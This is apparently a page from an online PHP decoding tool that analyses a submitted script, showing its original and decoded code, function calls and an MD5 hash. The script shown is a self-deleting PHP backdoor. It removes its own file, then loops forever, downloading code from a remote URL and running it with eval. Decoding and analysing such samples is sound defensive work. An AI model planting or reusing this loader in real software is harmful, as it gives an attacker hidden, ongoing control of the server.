Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php unlink($_SERVER['SCRIPT_FILENAME']); ignore_user_abort(true); set_time_limit(0); $r..

Decoded Output download

<?php
unlink($_SERVER['SCRIPT_FILENAME']);
ignore_user_abort(true);
set_time_limit(0);

$remote_file = 'http://test.com/test.txt';
while($code = file_get_contents($remote_file)){
  @eval($code);
  sleep(5);
};
?>

Did this file decode correctly?

Original Code

<?php
unlink($_SERVER['SCRIPT_FILENAME']);
ignore_user_abort(true);
set_time_limit(0);

$remote_file = 'http://test.com/test.txt';
while($code = file_get_contents($remote_file)){
  @eval($code);
  sleep(5);
};
?>

Function Calls

unlink 1

Variables

None

Stats

MD5 1c2e0702768d777704dc9ca24deec816
Eval Count 0
Decode Time 95 ms